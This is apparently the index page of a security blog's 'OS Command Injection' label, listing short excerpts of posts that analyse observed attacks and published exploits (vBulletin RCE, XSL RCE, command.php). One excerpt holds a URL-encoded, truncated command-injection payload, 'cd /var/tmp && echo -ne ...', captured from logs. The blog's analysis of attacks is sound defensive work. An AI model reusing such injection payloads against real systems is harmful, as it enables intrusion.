neonprimetime security , just trying to help

Showing posts with label OS Command Injection. Show all posts
Showing posts with label OS Command Injection. Show all posts
Tuesday, August 9, 2016

command.php wget HTTP Post

›
POST /command.php HTTP/1.0 User-Agent: Wget(linux) cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78...

hndUnblock.cgi wget calls

›
GET /hndUnblock.cgi HTTP/1.0 User-Agent: Wget(linux) Saw this http request in the logs, what could it mean? It appears that in April 2...
Friday, February 5, 2016

›
I really enjoyed TechAnarchy's blog on a command injection vulnerability in Security Onion. It was easy to read and thus very education...
Sunday, November 15, 2015

vBulletin 5.1.x #rce walk-through

›
I saw this vBulletin rce exploit on pastebin written in python by Mauritania Attacker. Thought it was interesting and worth talking thru. ...
2 comments:
Tuesday, November 10, 2015

Digging Deeper on xsl payload ‏@e3xpl0it #XXE #RCE

›
I saw this tweet by ‏@e3xpl0it about Remote Code Execution in XSL (EXtensible Stylesheet Language) Transformations. It contained as ex...
›
Home
View web version
Powered by Blogger.